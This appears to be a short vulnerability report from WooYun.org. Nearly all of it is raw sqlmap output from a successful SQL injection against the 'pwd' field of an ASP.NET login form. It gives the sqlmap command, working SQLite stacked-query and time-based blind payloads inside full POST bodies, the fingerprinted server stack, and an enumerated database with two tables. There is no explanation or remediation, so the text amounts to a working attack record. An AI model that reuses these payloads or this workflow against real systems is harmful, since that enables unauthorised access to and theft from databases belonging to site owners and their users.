WooYun.org

sqlmap.py -r 1.txt --dbs -p "pwd" --time-sec=20
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pwd (POST)
Type: stacked queries
Title: SQLite > 2.0 stacked queries (heavy query)
Payload: btn_ok=%e7%a1%ae%e8%ae%a4&mempass=on&pwd=123'; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))--&username=prkwjjqi&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKD2LG0DwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBkX3KMzobCugUZYVJvbPN9NfN81d&__VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55So5oi35ZCN5oiW5a+G56CB6ZSZ6K+v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFB21lbXBhc3OHP+RqrB+eSww5mOSTLLbk69tqnQ==
Type: AND/OR time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: btn_ok=%e7%a1%ae%e8%ae%a4&mempass=on&pwd=-2753' OR 6007=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2)))) AND 'YeZM'='YeZM&username=prkwjjqi&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKD2LG0DwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBkX3KMzobCugUZYVJvbPN9NfN81d&__VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55So5oi35ZCN5oiW5a+G56CB6ZSZ6K+v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFB21lbXBhc3OHP+RqrB+eSww5mOSTLLbk69tqnQ==
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: SQLite
Database: SQLite_masterdb
[2 tables]
+------+
| ! |
| \x02 |
+------+